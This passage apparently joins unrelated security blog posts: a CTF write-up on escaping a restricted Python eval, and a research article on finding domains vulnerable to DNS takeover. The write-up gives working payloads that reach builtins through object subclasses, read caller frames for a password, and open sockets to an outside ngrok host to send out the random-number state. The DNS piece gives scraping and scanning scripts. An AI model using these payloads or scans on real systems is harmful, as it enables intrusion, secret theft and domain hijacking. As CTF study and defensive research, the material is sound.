os.remove("password.txt") # No more reading the file!
solution = random.getrandbits(32)
answer = input()
result = eval(answer, {})
if result == solution:
    print(f"{result}, correct! The password is '{password}'.")
else:
    print(f"Result: {result}. The correct answer was {solution}.")
Now we are a little bit more restricted in the eval, but we have a bigger problem: the password file is just being deleted!
The information is in the password variable, but there is no file to read it.
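We have (possibly) two options to get the correct result here: read the password variable directly from the running program, or come up with the very same random number the server generated.
Since we can’t access the caller variables from the eval scope (more on that later!), I went for the second option, which is the unintended solution :S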
I knew it is possible to predict the next random values in some scenarios, but getting previous random values is a different species.
The algorithm for the random module in Python is called Mersenne Twister, which is a pseudorandom number generator (PRNG), but it is not a Cryptographically Secure PRNG.
While searching for this, I came across this EXCELLENT series of articles on cracking random values, by this beast crypto-hacker called James Roper.
It turns out the Mersenne Twister is based on a state formed by 624 32-bit numbers. The random module allows you to get the current state. Let’s try it:
import random
random.getrandbits(32)
1273474650
random.getstate()
(3, (2494642692, 1550483902, 881532875, ..., 705994986, 3574982157, 1), None)
The function returns a tuple with 3 values and the middle value is the state. It also has a number at the end - 1 in this case. I didn’t learn what this number means, but it was either 1 or 624. That is enough.
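For the curious, the shape of that tuple can be poked at locally. A small sketch on CPython, using a private Random instance and an arbitrary seed so it is repeatable; as far as I can tell, the trailing number is the generator’s current position inside the 624-word array, which would explain the two values seen:

```python
import random

rng = random.Random(1234)   # arbitrary seed, only to make the demo repeatable
version, internal, gauss_next = rng.getstate()

# 624 state words plus one trailing position value
print(version, len(internal), internal[-1], hex(internal[0]))

rng.getrandbits(32)         # consume exactly one 32-bit output
print(rng.getstate()[1][-1])
```

Right after seeding the position is 624 (the whole block is used up, so the next call regenerates it), and after one 32-bit output it is 1. The first word right after seeding is the 0x80000000 constant that the PoC below restores by hand.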
Let’s check if we can get the server state.
__import__('random').getstate()
OK, I’m convinced.
The article has an algorithm that, in theory, can reverse the random state to the previous one. If we can calculate the previous state and set it again - using random.setstate() - we can generate the same random value again!
Let’s translate the article algorithm to Python and make a PoC:
import random

# Get the state before the random
_, first_state, _ = random.getstate()
# Get the solution random value
solution = random.getrandbits(32)
# Get the state after the random
first, current_state, last = random.getstate()
# Turn the state into a list, to work on it
new_state = list(current_state)
# Last was the constant number (1 or 624)
new_state[-1] = 624
# https://jazzy.id.au/2010/09/25/cracking_random_number_generators_part_4.html
for i in reversed(range(624)):
    result = 0
    tmp = new_state[i]
    tmp = tmp ^ new_state[(i + 397) % 624]
    if ((tmp & 0x80000000) == 0x80000000):
        tmp = tmp ^ 0x9908b0df
    result = (tmp << 1) & 0x80000000
    tmp = new_state[(i - 1 + 624) % 624]
    tmp = tmp ^ new_state[(i + 396) % 624]
    if ((tmp & 0x80000000) == 0x80000000):
        tmp = tmp ^ 0x9908b0df
        result = result | 1
    result = result | ( (tmp << 1) & 0x7fffffff )
    new_state[i] = result
# First value is always a constant
# Binary 10000000000000000000000000000000
new_state[i] = 2147483648
# Compare the states
print(new_state == list(first_state))
complete_target_state = (3, tuple(new_state), None)
random.setstate(complete_target_state)
cracked_solution = random.getrandbits(32)
print(f'Solution : {solution}')
print(f'Cracked Solution: {cracked_solution}')
Resulting in poc_crack_rand.py:
True
Solution : 1920796803
Cracked Solution: 1920796803
It works! All the crypto-credits to James Roper. I just used his algorithm.
But now we need to do this in our VERY LIMITED eval command. It is probably possible, but I thought it would be easier to send the state to a server controlled by me, to calculate the answer remotely and just send the result back.
If the result of the eval is the same “random” number, it will display the password.
Remember:
# ...
solution = random.getrandbits(32)
# ...
result = eval(answer, {})
if result == solution:
    print(f"{result}, correct! The password is '{password}'.")
# ...
Socket operations are multiline, which seems like a limit in our eval, but we can just chain different calls and simulate local variables with a list comprehension.
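The trick is easier to see without sockets. In this sketch a plain list stands in for the socket object: the inner `for x in [...]` binds a "variable", the inner list runs several calls in order, and indexing picks the value we care about.

```python
# x is bound once, three expressions run in sequence, and [0][2] selects
# the result of the last one (here: the length after two appends).
expr = "[[x.append('connect'), x.append('send'), len(x)] for x in [[]]][0][2]"
print(eval(expr, {}))
```

The same shape is used in the payloads that follow, with connect, send and recv in place of the appends.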
Let’s spawn an ngrok session with a netcat backend to try receiving the server random state.
nc -lnvp 7777
Listening on 0.0.0.0 7777
Send some random payload through the socket.
[[x.connect(('2.tcp.ngrok.io', 19801)), x.send(b'a'*100), x.close()] for x in [__import__('socket').socket()]]
And our netcat receives a knock on the door:
Connection received on 127.0.0.1 34756
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
OK, let’s do it again, but with the random state of the server:
[[x.connect(('0.tcp.ngrok.io', 12851)), x.send(bytes(str(__import__('random').getstate()), 'UTF-8')), x.recv(20)] for x in [__import__('socket').socket()]]
which pings our netcat:
Connection received on 127.0.0.1 58092
(3, (3124877765, 267264362, 3570554370, 1064243459, 1732759887, 1732358228, 2719541217, 2504092942, 1438060417, 3270814677, 1986441919, 2698534769, 344725754, 3904667424, 2469278522, ...
OK, now we can crack the state and just send the correct guess back to our eval RCE.
Run the Cracking Server, a socket app to receive the state and crack it:
import random
import socket

def str_to_state(state_str):
    # The state arrives as the str() of a tuple; evaluate it back into one
    return eval(state_str, {})

# https://jazzy.id.au/2010/09/25/cracking_random_number_generators_part_4.html
def get_last_state(current_state):
    new_state = list(current_state)
    new_state[-1] = 624
    for i in reversed(range(624)):
        result = 0
        tmp = new_state[i]
        tmp = tmp ^ new_state[(i + 397) % 624]
        if ((tmp & 0x80000000) == 0x80000000):
            tmp = tmp ^ 0x9908b0df
        result = (tmp << 1) & 0x80000000
        tmp = new_state[(i - 1 + 624) % 624]
        tmp = tmp ^ new_state[(i + 396) % 624]
        if ((tmp & 0x80000000) == 0x80000000):
            tmp = tmp ^ 0x9908b0df
            result = result | 1
        result = result | ( (tmp << 1) & 0x7fffffff )
        new_state[i] = result
    new_state[i] = 2147483648 # constant
    return new_state

def reverse_random_state(current_state_str):
    _, current_state, _ = str_to_state(current_state_str)
    last_state = get_last_state(current_state)
    complete_target_state = (3, tuple(last_state), None)
    random.setstate(complete_target_state)

# https://www.digitalocean.com/community/tutorials/python-socket-programming-server-client
def server_program():
    remote_random_state = ''
    host = '0.0.0.0'  # listen on all interfaces
    port = 7777  # any unprivileged port (above 1024)
    server_socket = socket.socket()  # get instance
    # look closely. The bind() function takes tuple as argument
    server_socket.bind((host, port))  # bind host address and port together
    # backlog of pending connections
    server_socket.listen(2)
    conn, address = server_socket.accept()  # accept new connection
    print("Connection from: " + str(address))
    while True:
        # receive data stream, up to 100 KiB per recv() call
        data = conn.recv(1024 * 100).decode()
        print("from connected user: " + str(data))
        print("\n"*5)
        if not data:
            # if data is not received break
            break
        remote_random_state += str(data).strip()
        # the state tuple is complete once its closing "), None)" arrives
        if remote_random_state.find('), None)') >= 0:
            reverse_random_state(remote_random_state)
            answer = str(random.getrandbits(32))
            # send cracked random to the client
            conn.send(answer.encode())
            break
    conn.close()  # close the connection
    server_socket.close()

if __name__ == '__main__':
    server_program()
In the eval payload, we also have to process the response from the cracking server, to make it an int:
int([[x.connect(('8.tcp.ngrok.io', 15754)), x.send(bytes(str(__import__('random').getstate()), 'UTF-8')), x.recv(20), x.close()] for x in [__import__('socket').socket()]][0][2])
And, let’s run our Exploit to make the attack easier.
And we finally receive the prize:
1364310140, correct! The password is 'E46Dnqb5enAMgGArbruu'
Password: E46Dnqb5enAMgGArbruu
Let’s just try the same payload, of course.
Now it also blocks our built-in functions, like int and __import__.
It is now like a standard SSTI challenge. We can get the classes and builtins we need from the primitive types, like tuple and str.
Let’s check our available classes on the server:
().__class__.__base__.__subclasses__()
A lot of stuff. The interesting class here is warnings.catch_warnings. It allows us to get to the builtins.
Let’s try a simple RCE.
{x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['int']("12")
And…
Result: 12. The correct answer was 2743938107.
OK, we’re in again.
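The same walk can be reproduced locally. A minimal sketch, assuming level 3 evaluates the input with emptied builtins, something like {"__builtins__": {}} (the real source was not shown), and importing warnings first so the class is guaranteed to be loaded:

```python
import warnings  # make sure catch_warnings exists among object's subclasses

payload = (
    "{x.__name__: x for x in ().__class__.__base__.__subclasses__()}"
    "['catch_warnings']()._module.__builtins__['int']('12')"
)

# Assumption: this mimics the server's restricted eval; the exact globals
# used by the challenge are unknown.
result = eval(payload, {"__builtins__": {}})
print(result)
```

Even with no builtins in scope, the tuple literal leads to object, object leads to every loaded class, and one of those classes holds a reference to a module whose __builtins__ is intact.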
Let’s adapt our payload from level 2 to the new world order.
{x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['int']([[x.connect(('2.tcp.ngrok.io', 10157)), x.send({x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['bytes']({x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['str']({x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['__import__']('random').getstate()), 'UTF-8')), x.recv(20)] for x in [{x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['__import__']('socket').socket()]][0][2])
(It could be more readable, by making the builtins into a string variable here but… feel the vibe!)
utflag{LGvb7PJXG5JDwhsEW7xp}
After my Around the World in 80 days solution, the CTF ended and I went to see the other solutions. There were 70 solves! I obviously didn’t see the simpler solutions.
bawolff#3779
sent that:
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "catch_warnings"][0]()._module.sys._getframe(1).f_locals["password"]
That’s it: sys._getframe(1).f_locals to get local variables from the caller (dumb me).
And there was another, even simpler, approach, from bliutech#7756
.
__import__('__main__').password
(dumb me)^2
But it was so fun…
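For the record, the frame-walking solution can be reproduced locally. The sketch below assumes a hypothetical check_guess function that keeps the secret in a local variable and evaluates our expression with no builtins exposed; the function name and the fake password are mine, not the challenge's:

```python
import warnings  # assumption: makes sure catch_warnings is loaded, as on the server

PAYLOAD = (
    '[x for x in ().__class__.__base__.__subclasses__() '
    'if x.__name__ == "catch_warnings"][0]()'
    '._module.sys._getframe(1).f_locals["password"]'
)


def check_guess(expression):
    # Hypothetical stand-in for the challenge code: the secret is a local
    # variable of the function that calls eval().
    password = "not-the-real-password"
    # No builtins are exposed, mimicking the restriction of this level.
    return eval(expression, {"__builtins__": {}}, {})


leaked = check_guess(PAYLOAD)
print(leaked)
```

Frame 0 is the evaluated expression itself, so frame 1 is the function that called eval(), and its f_locals holds the secret.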
If you need to evaluate code from the client, it is hard to guarantee safety. Python might not be the best choice. Maybe JavaScript? Can you do it without running client-controlled code on the server?
If you really need it, you should look for safer, sandboxed solutions.
I’m sure I’m forgetting other important protections here. Send me hints for better security on Twitter.
This article describes an experiment aimed at finding domains likely vulnerable to DNS takeover, a well-known technique that can be used to steal decommissioned, but active domains. In this experiment I will show how I was able to find with little effort more than 200 domains that could be theoretically taken over across different providers and parent domains by using data from a public search tool (SecurityTrails) and an open-source repository (can-i-take-over-dns).
Please note that I did not find any new vulnerabilities nor develop any sort of attack tools or techniques during this research. I just analyzed what was already there, not being responsible in any way for whatever damages could be caused by the usage of the methods described below.
A Subdomain takeover is a vulnerability that happens when there is a CNAME record pointing a domain app.site.com
to a domain name.b.com
, in which domain b.com
belongs to a third-party platform that allows their customers to choose subdomains of their b.com
zone for usage with their services.
For example, let’s imagine we are the current owners of site.com
working with a provider named host.net
. We decide to use a managed application service from host.net
named service
to host our app myapp
. After configuring the service in host.net
, it gives us a subdomain in their service.host.net
zone hosting our app - let’s say myapp.service.host.net
. We’d like to access our app through our domain, not theirs, so we create a CNAME in the site.com
zone pointing app.site.com
to myapp.service.host.net
.
Later on we decide to remove our app from host.net
, releasing the domain name in their zone. If we don’t remember to remove the CNAME (we won’t), another customer of host.net
can come in and set up their own app named myapp
in the managed app service. They would be able to host any content they wanted under our app.site.com
subdomain, effectively taking over it.
A DNS takeover is a similar vulnerability, but instead of allowing an attacker to hijack the contents that users see when they access one of your subdomains, it allows attackers to gain control over an entire zone, being able to create any records they want to. It happens when an entity registers a domain in their registrar, delegates administration of the domain to another more convenient provider, and in the future deletes the domain in that provider. Since the delegation is still in the registrar, an attacker can create an account in the provider and recreate the domain.
For example, suppose we are a loyal customer of the cloud.net
provider. We just bought bigcorp.com
for the next year from GoDaddy (our preferred registrar), but we actually want to manage the bigcorp.com
zone using our cloud.net
provider and not GoDaddy. Next we would have to create a zone for bigcorp.com
in our cloud.net
provider, and then access GoDaddy and create an NS
record delegating the bigcorp.com
site to the nameservers of cloud.net
, which could be ns1.cloud.net
and ns2.cloud.net
.
Suppose we get tired of bigcorp.com
and decide to use bigcorp.io
instead. We would keep paying for bigcorp.com
for the following years, since we don’t want to lose the name. Then at some point someone would remove the bigcorp.com
zone from the cloud.net
portal, thinking it has no business being there if it’s not in use, thus creating what is called a lame delegation - when a domain points to nameservers that don’t actually respond authoritatively to queries for that domain. If an attacker realizes that bigcorp.com
has a lame delegation to cloud.net
nameservers, this person could create an account in our provider and recreate bigcorp.com
, being able to create all sorts of records there. For instance, they would be able to create subdomains of bigcorp.com
for phishing purposes, or create an MX
record to intercept all emails directed to bigcorp.com
.
In case you want to learn more before going further, Patrik Hudak’s blog has some pretty good educational articles describing these attacks, including other ways to find candidates for takeover with subdomain enumeration techniques, and how to develop other attacks after a subdomain takeover is exploited.
I wanted to know what could be done to better understand, and possibly help mitigate risks of DNS takeovers in the internet. Of course it’s an unreasonable goal, but one can dream, right? The first question that I wanted to answer was whether we could come up with a simple and effective way to find domains that were likely vulnerable to DNS takeover.
The problem is that no one really knows which records exist in a registrar apart from the registrar itself, since it owns the zonefiles. One could find a huge list of random domains somewhere and scan them for possible DNS takeover scenarios, but this is too time-consuming and in most cases unlikely to yield good results. To find possible scenarios we need a way to dump a list of domains that delegate their zones to nameservers of vulnerable providers.
At this point I was just thinking, but then I was casually talking to my friend Kali Nathalie about pentesting the other day, and she mentioned that SecurityTrails had a subdomain search tool with a pretty good database, so I browsed to it and found that, not only does it have a great database, but it also provides reverse NS and reverse CNAME lookups, our missing piece of the puzzle. That’s something you don’t find very often, since the DNS protocol does not specify these sorts of lookups - there’s no reason why it should, really.
Now the plan was:
First I extracted all nameservers of the vulnerable providers from indianajson’s can-i-take-over-dns repository. His repository currently documents the state of 28 providers regarding DNS takeover, 19 of which are currently listed as “Vulnerable” or “Edge Case”. Besides the “Not Vulnerable” nameservers, all CloudFlare nameservers were ignored for this step, since a successful attack is unlikely due to their high number of nameservers.
I had a list of 379 nameservers from 18 providers to search:
Provider | # of nameservers evaluated |
---|---|
Azure | 228 |
NS1 | 72 |
Google Cloud | 28 |
DNSMadeEasy | 7 |
Hurricane Electric | 5 |
DNSimple | 4 |
Dotster | 4 |
EasyDNS | 4 |
000Domains | 4 |
Bizland | 4 |
Name.com | 4 |
Digital Ocean | 3 |
Domain.com | 2 |
TierraNet | 2 |
Reg.ru | 2 |
Yahoo Small Business | 2 |
Linode | 2 |
MyDomain | 2 |
For the top 3 providers in the table I just guessed their nameservers by trial and error since they weren’t explicitly listed in indianajson’s repository, so the real number could be more or less than what I found.
Also note that, in most cases, many nameservers in the same provider will serve records from the same zonefiles, some acting as backups in case others fail. That should not stop us from analyzing them though, since some domains might not appear in the database as being associated with all nameservers of their provider. As long as we have the time to do so, the chances are we will be getting more domains this way.
I decided to try one of the Azure nameservers manually, going through the pages in SecurityTrails and dumping the domains from the search results table with JavaScript:
var my_rows = document.querySelectorAll("tbody>tr a")
var my_domains = []
my_rows.forEach((row) => {
row.childNodes.forEach(
(link) => {
my_domains.push(link.textContent)
}
)
})
console.log(my_domains.join("\n"))
In the first nameserver I tried I found 3728 domains pointing to it. Then I ran dig
over all 3728 domains to see whether any of them returned a SERVFAIL
or a REFUSED
error:
$ cat domains-poc.txt | while read name; do res=$(dig $name | grep -Po 'status: [^,]+'); echo "$name $res"; done > results.txt
In the results.txt
I found 8 zones vulnerable to DNS takeover reporting SERVFAIL
s - 3 under .com
, 1 under .com.br
, 1 under .com.np
and the rest in .app
, .bg
, .dev
. This was very scary as it was so easy to find. I double-checked them with dig +norecurse <DOMAIN> NS
and indeed they were pointing to the nameserver I was testing. I even logged into my Azure account to check whether I could verify that the names were available in the zone registration page, and indeed they were.
I thought that this could be a red flag - some nameservers could be authoritative for hundreds of thousands of zones, so 8 zones that could be taken over in a small set of 3728 (0.2%) seemed like a lot.
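The check done by the shell loop above boils down to reading the status field from dig's header line and flagging the two statuses of interest. A rough Python equivalent of that classification step is sketched below; the function names and the sample header are mine, for illustration only:

```python
import re

# Statuses that suggest a lame delegation in this experiment.
LAME_STATUSES = {"SERVFAIL", "REFUSED"}


def dig_status(dig_output):
    """Return the status field of dig's header line, or None if it is absent."""
    match = re.search(r"status: ([A-Z]+)", dig_output)
    return match.group(1) if match else None


def looks_lame(dig_output):
    """True when the response status is one of the suspicious ones."""
    return dig_status(dig_output) in LAME_STATUSES


# Illustrative header line in the format dig prints.
sample = ";; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 4242"
print(dig_status(sample), looks_lame(sample))
```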
Now, if I wanted to step up the game, I’d need deeper access to SecurityTrails’ database. All I had at the moment was a search box limited to 10.000 results per query, paginated across pages limited to 100 results. Besides that, SecurityTrails’ API is limited to 50 queries per month and doesn’t include the SQL API unless you pay a minimum of US$500 for a subscription, which is slightly out of my budget for personal research projects.
I decided to go the easy way and just stick to the 10.000 limit, since I figured I wouldn’t be able to run billions of DNS queries in a short time anyway. So I made a quick Selenium script using the Undetected Chromedriver webdriver to scrape the data from SecurityTrails (this wouldn’t be so easy without Selenium, since SecurityTrails is behind CloudFlare):
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.by import By
import undetected_chromedriver as uc
import re
options = uc.ChromeOptions()
driver = uc.Chrome(use_subprocess=True, options=options)
driver.get("https://securitytrails.com/")
driver.maximize_window()
driver.add_cookie({
"name": "SecurityTrails",
"value": "<My SecurityTrails Session Cookie>"
})
def reverse_ns_sample(domain, output_file):
    # Scrape every result page of the reverse NS lookup for one nameserver
    domains = []
    lookup_url = f"https://securitytrails.com/list/ns/{domain}"
    driver.get(lookup_url)
    wait = WebDriverWait(driver, 12)
    driver.implicitly_wait(5)
    end_of_page = 100
    end_of_results = -1
    pagination_text = ''
    while end_of_page != end_of_results:
        sample = driver.find_elements(By.CSS_SELECTOR, "tbody>tr a")
        try:
            page_domains = [el.text for el in sample]
        except Exception:
            # Elements can go stale while the page re-renders; skip this batch
            page_domains = []
        if page_domains:
            output_file.write('\n'.join(page_domains) + '\n')
        domains += page_domains
        pagination = wait.until(
            ec.presence_of_element_located(
                (By.CLASS_NAME, 'pagination-details')
            )
        )
        pagination_text = pagination.text.replace('\n', ' ').replace('\r', ' ')
        pagination_numbers = re.search(
            r'- ([\d,+]+) of ([\d,+]+) results',
            pagination_text
        ).groups()
        # Both values are strings; the loop stops when they are equal
        end_of_page = pagination_numbers[0]
        end_of_results = pagination_numbers[1]
        next_page_btns = driver.find_elements(By.CSS_SELECTOR, ".tooltip li a")
        try:
            for btn in next_page_btns:
                if btn.text == '›':
                    btn.click()
                    break
        except Exception:
            pass
    n_domains = len(domains)
    print(f'[+] {n_domains} domains written to output file.')
    return domains
total_n_domains = 0
with open('nameservers.txt') as f:
    nameservers = list(map(lambda x: x.rstrip(), f.readlines()))
with open('output.txt', 'a+', encoding='utf-8') as output_file:
    for nameserver in nameservers:
        print(f'[+] Fetching results from {nameserver}')
        try:
            # Count the domains found, not the nameservers processed
            total_n_domains += len(reverse_ns_sample(nameserver, output_file))
        except Exception as e:
            print(f'[+] Error on nameserver {nameserver}: "{e}"')
driver.quit()
print(f'[+] Found a total of {total_n_domains} domains.')
I was pretty surprised that I wasn’t blocked from the platform after a little more than 48 hours of queries, but these were all legitimate queries made by my browser after all. Or maybe I’m lying, I just made up this code, and in reality I went through thousands of pages of results manually, copying and pasting domains. Who knows…
After that it was time to actually check these domains. I was not going to do it sequentially with dig
, because I suspected half a million queries would take some time to finish, so I used zdns to make the queries (and jq to analyze the results):
$ cat output.txt | ./zdns SOA --threads 10 --name-servers=8.8.8.8,8.8.4.4 > soa-results.json
Note that I lowered the number of threads here instead of using the default of 1000 threads because I was worried that the queried servers would start refusing queries if I sent too many in a short amount of time. That would generate false positives, which wasn’t what I wanted. I’m not sure whether they do that or not, but it seemed possible.
Then I filtered for SERVFAIL
s and REFUSED
s:
$ jq -r 'select(.status == "SERVFAIL" or .status == "REFUSED") | "\(.name),\(.status)"' soa-results.json > lame-names.txt
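For readers without jq at hand, the same filter can be sketched in Python. It assumes what the jq expression above already relies on: one JSON object per line, each with a name and a status field. The function name and the sample lines are made up for illustration:

```python
import json


def lame_names(json_lines):
    """Yield (name, status) for every record with a SERVFAIL or REFUSED status."""
    for line in json_lines:
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        if record.get("status") in ("SERVFAIL", "REFUSED"):
            yield record["name"], record["status"]


# Made-up records shaped like the fields used by the jq filter.
sample_lines = [
    '{"name": "ok.example", "status": "NOERROR"}',
    '{"name": "lame.example", "status": "SERVFAIL"}',
    '{"name": "closed.example", "status": "REFUSED"}',
]
csv_rows = [f"{name},{status}" for name, status in lame_names(sample_lines)]
print("\n".join(csv_rows))
```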
The last thing I needed to do was get the nameservers of our lame names, in order to really validate that the information we got from SecurityTrails was accurate:
$ cat lame-names.txt | awk -F',' '{print $1}' | ./zdns NS --iterative --threads 3 > lame-ns-results.json
Finally I just went through these results, removing the ones that pointed to nameservers that weren’t in our base set. Whatever domains were left in the list were likely vulnerable to takeover :-)
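That last filtering step could look roughly like the sketch below. It assumes the NS results were already reduced to a plain mapping from domain to nameserver names, and it keeps a domain when at least one of its nameservers is in the base set; both the input shape and that rule are my simplifications, and the names are hypothetical:

```python
def normalize(nameserver):
    """Compare nameservers case-insensitively and without the trailing dot."""
    return nameserver.strip().rstrip(".").lower()


def likely_vulnerable(ns_by_domain, base_nameservers):
    """Keep domains delegated to at least one nameserver of the base set."""
    base = {normalize(ns) for ns in base_nameservers}
    return sorted(
        domain
        for domain, nameservers in ns_by_domain.items()
        if any(normalize(ns) in base for ns in nameservers)
    )


# Hypothetical data, reusing the cloud.net provider from the example earlier.
base_set = ["ns1.cloud.net", "ns2.cloud.net"]
observed = {
    "bigcorp.com": ["NS1.cloud.net.", "ns2.cloud.net."],
    "moved-away.com": ["ns1.other-provider.example."],
}
print(likely_vulnerable(observed, base_set))
```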
For this analysis, I considered that a domain is likely vulnerable to takeover (LVT) if:
- its NS records point to nameservers in our base set of vulnerable providers
- queries for it return a SERVFAIL or REFUSED status (lame delegation)
This definition is pretty good for our purposes, but note that false positives could arise from it - the can-i-take-over-dns repository might not be a completely accurate source, or a provider might refuse to answer a query for reasons other than the zone being available for registration in their platform, such as the domain being “blacklisted/suspended” or rate-limiting being applied.
This experiment generated a set of 414.537 unique domains to analyze, which were distributed as follows (top 15):
From the base set of unique domains, the vast majority of domains (414.212 - 99.9%) responded to the SOA query with a NOERROR (98.72%) or NXDOMAIN (1.19%) status, which is pretty good, but 324 domains returned a SERVFAIL and 1 domain returned a REFUSED.
I went on to double-check the nameservers of these 325 domains to filter out the ones that weren’t actually pointing to our set of vulnerable nameservers. 112 (34%) of these domains had NS records that weren’t in our base set of nameservers, leaving us with 213 domains that were likely vulnerable to takeover. I won’t be releasing the list of domains for obvious reasons, but here’s how they were distributed in case you’re curious about it:
And here’s the full list of the parent domains in which the LVT domains were found:
Parent domain | # of LVT domains |
---|---|
com | 132 |
net | 13 |
org | 11 |
xyz | 5 |
io | 5 |
com.br | 4 |
ng | 3 |
ml | 3 |
nu | 2 |
nl | 2 |
info | 2 |
com.fj | 2 |
co.uk | 2 |
biz | 2 |
us | 1 |
uk | 1 |
team | 1 |
solutions | 1 |
shop | 1 |
pro | 1 |
org.fj | 1 |
net.fj | 1 |
in | 1 |
im | 1 |
host | 1 |
fm | 1 |
fi | 1 |
eu | 1 |
dev | 1 |
com.co | 1 |
com.au | 1 |
co.nz | 1 |
co.in | 1 |
co.fk | 1 |
co | 1 |
click | 1 |
cc | 1 |
ca | 1 |
bot | 1 |
az | 1 |
It’s clear that lame delegations are a problem for registrars, and that vulnerability to DNS takeovers is a problem for providers of DNS services. Below are some ideas to mitigate this sort of issue:
Lame Delegation Cleanup. Registrars can continuously check NS records in their zones for lame delegations, remove the corresponding records and notify the corresponding customers. If an NS record exists for a domain, but the associated nameservers don’t answer to queries for that domain, it has no function and should be deleted as quickly as possible. This is allegedly done by some registrars, but the protocols for it have to be reviewed and standardized considering this kind of risk - some entities can take up to 30 days notifying customers of the issue to effectively remove a lame NS record from their zones.
Nameserver Segregation. Providers can distribute their zones into sets of multiple distinct nameservers and assign them to customers randomly in a way that it becomes impractical, or even impossible, for an attacker to carry out DNS takeovers due to the high amount of attempts the attacker would have to perform in order to get at least one of the nameservers that were registered as authoritative for the affected domain. AWS and CloudFlare seem to implement controls which are similar to this approach. A simple way to extend this approach and effectively mitigate the issue: when processing the request for a new zone, the provider could just query the domain just like we did in this article to figure out whether it currently has a lame delegation to a subset of its nameservers. Then, if so, the provider could just avoid registering the zone in that subset of nameservers, using other nameservers from their pool instead. If the provider has no available nameservers to hand out after this procedure, then it should just return an error.
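The extension suggested for nameserver segregation can be sketched in a few lines: before creating a zone, drop from the pool every nameserver the domain is already delegated to, pick from what is left, and fail if there is not enough left. Everything here (function name, pool, error type) is hypothetical and only illustrates the idea:

```python
import random


def pick_nameservers(pool, currently_delegated, count, rng=random):
    """Choose `count` nameservers, avoiding those the domain already points to."""
    delegated = {ns.rstrip(".").lower() for ns in currently_delegated}
    candidates = [ns for ns in pool if ns.rstrip(".").lower() not in delegated]
    if len(candidates) < count:
        # Nothing safe to hand out: refuse the zone instead of enabling a takeover.
        raise RuntimeError("no safe nameservers available for this zone")
    return rng.sample(candidates, count)


# Hypothetical provider pool and a domain with a lame delegation to two of them.
pool = ["ns1.cloud.net", "ns2.cloud.net", "ns3.cloud.net", "ns4.cloud.net"]
lame_delegation = ["ns1.cloud.net.", "NS2.cloud.net."]
print(sorted(pick_nameservers(pool, lame_delegation, 2)))
```

With this rule, a new customer claiming the zone never receives a nameserver that the stale NS records at the registrar still reference.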
Detection & Response. Providers can keep logs of who is claiming which zones and develop automatic detection of strange patterns, such as a recently-removed zone being claimed by a different customer than the previous one, or the same customer trying to register many recently-removed zones previously owned by other customers in a short amount of time. This can then be used to notify customers of suspicious behavior and guide possible restrictive actions.
Developing Awareness. Vulnerable providers can warn customers explicitly when they try to remove a zone, informing them that they must remove the NS record at their registrar prior to removing the delegated zone.
This work was executed with limited resources and during the course of 3 days. To better understand this sort of issue it would be beneficial if someone were to try expanding it to a larger sample of domains, for example in the order of tens of millions. I imagine that one could possibly find many more LVT domains by having access to SecurityTrails’ SQL API and a big quota.
A tool could be written to check whether a domain is really available for registry in a provider using the provider’s API, or even go one step further and actually perform the takeover automatically. In cases where the provider implements some sort of nameserver segregation, the tool could try repeatedly until it gets the right nameserver. This kind of tool would make it easier to verify this sort of situation directly, although it might be a little bit hard to maintain, since it’s likely that providers will make changes to their infrastructure from time to time, possibly even mitigating takeover scenarios.
The same kind of mass experiment can be performed for the case of subdomain takeovers, although it was out of the scope of this work. If one knows of a base target domain associated with a service vulnerable to subdomain takeovers (like those described in EdOverflow’s can-i-take-over-xyz repo), one could use a reverse CNAME database such as SecurityTrails’ to find every domain that points to this service. For example, suppose Azure AppServices - which uses .azurewebsites.net
, a domain with more than 1 million subdomains - is vulnerable. One could use SecurityTrails’ database to get all of the more than 1 million subdomains of .azurewebsites.net
, check which ones fit the pattern of subdomain takeover (such as those returning NXDOMAIN
), and then check whether these domains have reverse CNAMEs that could be taken over. This could be an exhaustive task in some cases or not so much in others, depending on the size of the subdomain space for the analyzed service and on the % of dangling CNAMEs pointing to its subdomains.
After writing this article I found other data sources that provide interesting reverse lookups such as the reverse NS lookup that was used in this analysis. Although some of these are somewhat limited/expensive, data from these sources could be used instead of SecurityTrails’ to perform similar analyses, comparing or complementing the results:
Source | Interesting Lookups | Limits |
---|---|---|
SecurityTrails | Reverse NS, Reverse CNAME, Reverse MX | Max 10.000 results/lookup |
ViewDNS | Reverse NS, Reverse MX | Unknown |
DomainTools | Reverse NS | Subscription members only |
WhoisXMLAPI | Reverse NS, Reverse MX | 5 pages of 300 results/minute |
DNSLytics | Reverse NS, Reverse MX | Subscription members only (max 2.500 results/lookup) |
Some time later I improved the first draft of the scraper used in this analysis and added basic support for ViewDNS and WhoisXMLAPI lookups. I won’t be maintaining it for long probably, but it can be a starting point for others trying to perform this kind of analysis: Macmod/NameScraper.
The Forward DNS dataset from Rapid7’s Project Sonar could also be an interesting source of information for similar analyses. Although they don’t provide a web-based search tool, they provide daily compressed datasets of all sorts of DNS lookup results, in JSON, and going many years back. This data could be analyzed with zgrep
and jq
- like what @buckhacker did in 2018 in his How to do 55.000+ Subdomain Takeover in a Blink of an Eye article.
Although not widely exploited yet, DNS takeovers pose a relevant risk for customers, registrars and providers of DNS services. That risk could be increased by attackers having access to public databases mapping nameservers to domains for which they are authoritative (reverse NS lookups), and by the fast pace with which DNS zones are being registered and removed from DNS providers. Registrars and providers have the means to verify and mitigate these risks in their DNS services, but they are probably still not taking action as quickly and as effectively as they should to protect their customers.
Finally, about the title of the article - I did have lots of fun doing this, but I didn’t really profit anything, so for now I just hope this article was instructive for readers and that this will inspire researchers, registrars and providers to think about the problem =)
HackTM CTF was an event hosted by WreckTheLine. It was a really nice event and there were some very cool challenges. As it was Carnival in Brazil, my teammates were not going to play, so I decided to play alone anyway.
